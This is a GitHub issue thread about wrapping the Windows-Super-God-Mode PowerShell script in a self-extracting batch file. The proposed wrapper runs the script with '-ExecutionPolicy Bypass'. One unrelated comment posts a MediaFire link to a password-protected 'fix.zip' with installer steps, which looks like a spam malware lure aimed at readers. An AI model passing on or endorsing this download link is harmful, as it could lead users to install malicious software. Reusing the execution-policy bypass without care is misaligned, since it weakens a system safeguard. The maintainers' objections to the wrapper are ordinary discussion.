### ISSUE TITLE
Release Idea: batch file wrapper launcher

### ISSUE THREAD

**Issue by SmilerRyan** [ThioJoe/Windows-Super-God-Mode#9]
In order to make things easier to launch, why not put the powershell script directly into a batch file, so the user doesn't need to download both files and run them from the same directory?

here's is the code that would go on top of the batch file, then below that can just contain the signed script itself.
```batch
@(for /f "usebackq skip=3 delims=" %%a in (%0) do @(@echo %%a)) > "%temp%/Super_God_Mode.ps1"
@powershell -ExecutionPolicy Bypass -File "%temp%/Super_God_Mode.ps1" & exit /b
:: The lines above copy the script below into a powershell script and run it.
```

For a usable example, see this version of the v1.1.0 powershell wrapped in a batch file: [ThioJoe Super God Mode v1.1.0.zip](https://github.com/user-attachments/files/16742388/ThioJoe.Super.God.Mode.v1.1.0.zip)

**Comment by RokeJulianLockhart** [comment]
> https://github.com/ThioJoe/Windows-Super-God-Mode/issues/9#issue-2485529043

@SmilerRyan, it's a lot easier for the user to read and modify the script if they're separate. Your script breaks all syntax highlighting in any IDE. Considering that the user solely need invoke one script anyway, and the repository can be downloaded in a single click as an archive containing all files, I don't think that this is of much use.

The `.bat` file is an unnecessary shim on any system that has PowerShell's default security restrictions revoked anyway.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ThioJoe** [comment]
Yea that would just add an enormous level of complexity and points of failure. It's really not that hard to download the extra file or just run the command yourself if you don't want to use that.
